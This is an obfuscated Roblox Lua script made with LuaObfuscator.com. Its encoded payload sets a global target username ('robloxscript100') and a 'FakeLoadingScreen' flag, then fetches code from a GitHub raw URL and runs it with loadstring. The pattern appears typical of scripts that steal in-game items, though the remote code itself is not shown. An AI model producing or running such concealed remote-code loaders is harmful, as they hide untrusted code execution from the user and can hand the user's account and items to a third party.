--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((8 -6)^(v32-1)))%((2 + 0 + 0)^(((v33-1) -(v32-(268 -(141 + 126)))) + ((1 + 0) -0)));return v76-(v76%(2 -1));else local v77=(2 -0)^(v32-(3 -2));return (((v31%(v77 + v77))>=v77) and ((5562 -3589) -(1312 + 660))) or 0;end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + 2);v18=v18 + (1109 -(221 + 886));return (v40 * (104 + 152)) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (1024 -(8 + 1013)));v18=v18 + 3 + 1;return (v44 * ((5282892 + 11494841) -(42 + 475))) + (v43 * (11478 + 54058)) + (v42 * (2133 -((717 -(252 + 287)) + 1699))) + v41;end local function v24()local v45=v23();local v46=v23();local v47=1 + 0;local v48=(v20(v46,1376 -(581 + 794),1 + 19) * (2^(11 + 21))) + v45;local v49=v20(v46,1480 -(902 + 557),14 + 17);local v50=((v20(v46,809 -(219 + 558))==((2113 -(165 + 76)) -(1228 + 643))) and  -(2 -1)) or (1 + 0);if (v49==(0 + 0)) then if (v48==(0 -(0 + 0))) then return v50 * (374 -(225 + 149));else v49=1;v47=73 -(10 + 15 + 48);end elseif (v49==(3019 -972)) then return ((v48==(1561 -((2426 -1517) + 652))) and (v50 * (1/0))) or (v50 * NaN);end return v8(v50,v49-(608 + 415)) * (v47 + (v48/(2^((677 -498) -127))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v34) -(1 + 0));v18=v18 + v34;local v52={};for v63=1 -0, #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=1 + 0,v57 do local v66=v21();local v67;if (v66==1) then v67=v21()~=(648 -(506 + 142));elseif (v66==(1 + 1)) then v67=v24();elseif (v66~=(1518 -(690 + 825))) then else v67=v25();end v58[v65]=v67;end v56[11 -8]=v21();for v69=1 + 0,v23() do local v70=v21();if (v20(v70,55 -(37 + 17),1 + 0)==(16 -(15 + 1))) then local v83=v20(v70,2,3);local v84=v20(v70,4,7 -1);local v85={v22(),v22(),nil,nil};if (v83==(1019 -(472 + 547))) then v85[1 + 2]=v22();v85[4]=v22();elseif (v83==(1 + 0)) then v85[1997 -(554 + 1440)]=v23();elseif (v83==(692 -(662 + 28))) then v85[3]=v23() -((2 + 0)^16);elseif (v83==3) then v85[2 + 1]=v23() -((162 -(154 + 6))^16);v85[990 -(511 + 475)]=v22();end if (v20(v84,3 -2,1)==(2 -1)) then v85[218 -(121 + 95)]=v58[v85[33 -(4 + 27)]];end if (v20(v84,5 -3,2 + 0)==(1 + 0)) then v85[1 + 2]=v58[v85[3]];end if (v20(v84,3,8 -5)~=(1240 -(315 + 924))) then else v85[566 -(364 + 198)]=v58[v85[4]];end v53[v69]=v85;end end for v71=2 -1,v23() do v54[v71-(1 + 0)]=v28();end for v73=1 + 0,v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=713 -(232 + 481),v81 do if (((11271 -7403)>((2714 -(958 + 193)) -(90 + 283))) and (v107>=v90)) then v92[v107-v90]=v80[v107 + 1 + 0 + 0];else v94[v107]=v80[v107 + (2 -1)];end end local v95=(v81-v90) + (3 -2);local v96;local v97;while true do v96=v88[v78];v97=v96[1 + 0];if (((5831 -3155)<(22403 -17771)) and (v97<=(767 -(652 + 112)))) then if (((8954 -7030)>=(336 + 221)) and (v97<=1)) then if ((v97==(0 -0)) or (3124<=(415 + 342))) then v94[v96[2 -0]]=v96[1432 -((1042 -579) + 966)];else v94[v96[2 -0]]();end elseif ((((557 + 5892) -(695 + 429 + 527))>2963) and (v97==(3 -1))) then do return;end else local v120=v96[2];v94[v120]=v94[v120](v13(v94,v120 + 1 + 0,v79));end elseif ((((195 -143) + 79)<(1930 + 946 + 624)) and (v97<=((7 + 0) -2))) then if ((489<(1480 + 3460)) and (v97>((818 -(355 + 445)) -14))) then v94[v96[63 -(58 + 3)]][v96[8 -5]]=v96[1 + 3];else local v124=v96[3 -1];local v125=v94[v96[1421 -(740 + 678)]];v94[v124 + (650 -(46 + 603))]=v125;v94[v124]=v125[v96[494 -(66 + 424)]];end elseif ((v97==(28 -22)) or ((7807 -5398)==(1151 + 618))) then local v129=v96[2];local v130,v131=v91(v94[v129](v13(v94,v129 + (1817 -(578 + 1238)),v96[12 -9])));v79=(v131 + v129) -((406 + 291) -(77 + 619));local v132=0;for v135=v129,v79 do v132=v132 + (470 -(21 + 448));v94[v135]=v130[v132];end else v94[v96[3 -1]]=v37[v96[(1075 + 572) -(574 + 1070)]];end v78=v78 + 1 + 0;end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703083O00557365724E616D65030F3O00726F626C6F78736372697074312O3003113O0046616B654C6F6164696E675363722O656E2O01030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B4F612O7073312F312F6D61696E2F31000C3O0012073O00013O0030053O000200030012073O00013O0030053O000400050012073O00063O001207000100073O00200400010001000800122O000300094O0006000100034O00035O00022O00013O000100012O00023O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
